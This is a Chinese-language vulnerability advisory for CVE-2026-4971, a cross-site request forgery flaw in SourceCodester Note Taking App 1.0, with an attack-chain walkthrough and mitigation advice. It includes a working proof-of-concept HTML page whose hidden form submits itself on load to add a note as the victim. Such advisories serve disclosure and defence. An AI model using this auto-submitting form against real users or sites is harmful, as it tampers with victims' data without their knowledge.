CVE-2026-4971 CVSS 4.3 中危

CVE-2026-4971: Note Taking App跨站请求伪造漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4971

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

SourceCodester Note Taking App

漏洞概述

SourceCodester Note Taking App 1.0及之前版本存在跨站请求伪造（CSRF）漏洞。由于应用程序未能充分验证用户请求的来源，攻击者可诱导已认证用户在不知情的情况下执行非预期操作。该漏洞可被远程利用，且已有公开的利用代码，主要对用户的数据完整性构成威胁。

技术细节

该漏洞源于SourceCodester Note Taking App在处理关键业务请求时，未实施有效的CSRF防御机制，如未使用Anti-CSRF Token或未验证HTTP Referer头。攻击者可以构建特制的HTML页面，其中包含对目标应用API的恶意请求（例如添加或修改笔记）。当受害者访问此页面时，浏览器会自动附带受害者的会话凭证发送请求。由于服务器无法区分请求是由用户主动发起还是由恶意页面触发，从而执行了攻击者预设的操作。根据CVSS评分，攻击需要用户交互（如点击链接），虽然未导致机密性泄露，但破坏了数据的完整性。

攻击链分析

STEP 1

1. 侦察与准备

攻击者确认目标使用的是SourceCodester Note Taking App，并分析其功能接口以确定存在CSRF漏洞的端点。

STEP 2

2. 构造恶意载荷

攻击者编写包含恶意HTML表单的网页，该表单指向目标应用的易受攻击接口，并预设了修改数据的参数。

STEP 3

3. 投递攻击

攻击者通过社会工程学手段（如发送钓鱼邮件）诱导已登录的目标用户点击链接或访问恶意网页。

STEP 4

4. 执行非授权操作

受害者在浏览器中访问恶意页面，浏览器自动携带用户的会话Cookie向目标服务器发送请求。

STEP 5

5. 达成攻击效果

服务器接收并处理请求，以受害者的身份执行了攻击者预设的操作（如添加、删除数据），影响数据完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CSRF Vulnerability in SourceCodester Note Taking App -->
<!-- This PoC demonstrates adding a malicious note via CSRF -->
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://target-app/path/to/add_note" method="POST">
      <input type="hidden" name="note_title" value="Hacked by CSRF" />
      <input type="hidden" name="note_content" value="This note was added via Cross-Site Request Forgery." />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Auto-submit the form when the page loads
      document.forms[0].submit();
    </script>
  </body>
</html>

影响范围

SourceCodester Note Taking App <= 1.0

防御指南

临时缓解措施

建议管理员立即检查并升级SourceCodester Note Taking App。在无法立即升级的情况下，应在应用反向代理或WAF层面配置严格的Referer白名单策略，并强制设置Cookie的SameSite属性，以阻断跨域请求带来的CSRF风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4971
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4971
3 Details https://www.cvedetails.com/cve/CVE-2026-4971/
4 VulDB https://vuldb.com/cve/CVE-2026-4971
5 Link https://gist.github.com/Mohdanass/b7c5984922238397d10644f5f33ec592
6 Link https://vuldb.com/?ctiid.353858
7 Link https://vuldb.com/?id.353858
8 Link https://vuldb.com/?submit.777877
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表